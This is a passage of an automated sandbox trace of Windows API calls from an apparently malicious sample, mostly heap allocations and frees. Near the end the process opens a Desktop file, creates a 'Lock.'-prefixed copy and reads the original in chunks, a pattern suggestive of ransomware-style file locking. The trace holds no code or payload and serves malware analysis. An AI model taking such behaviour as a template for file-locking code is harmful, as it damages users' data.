returned 0x2e54dd8 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0201.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0201.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0201.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0201.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0201.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0201.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0201.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0201.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0201.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0201.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0201.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0201.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0201.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0201.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0201.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0201.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0201.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0201.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0201.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0201.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0201.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0201.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0201.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0201.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0201.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0201.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0201.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0201.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0201.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0201.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0201.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0201.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0201.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0201.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0201.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0201.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0201.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0201.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0201.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0201.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0201.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0201.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0201.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0201.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0201.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0201.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0201.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0201.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0201.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0201.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0201.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0201.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0201.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0201.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0201.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0201.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0201.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0201.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0201.269] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/PCRepair_rkill.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\pcrepair_rkill.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0201.269] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.269] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0201.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0201.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0201.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0201.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0201.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0201.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0201.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0201.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0201.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0201.270] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0201.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0201.270] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0201.270] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0201.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0201.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0201.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0201.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0201.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0201.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0201.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0201.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0201.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0201.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0201.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0201.271] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0201.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0201.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0201.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0201.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0201.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0201.271] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.PCRepair_rkill.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.pcrepair_rkill.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0201.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0201.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0201.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0201.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0201.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0201.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0201.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0201.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0201.309] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0201.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.309] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0201.309] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.309] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0201.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0201.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0201.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.377] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0201.377] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.381] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.384] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.386] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.388] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.391] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.393] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.395] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.397] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.400] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.403] ReadFile (in: hFile=0x2d0, 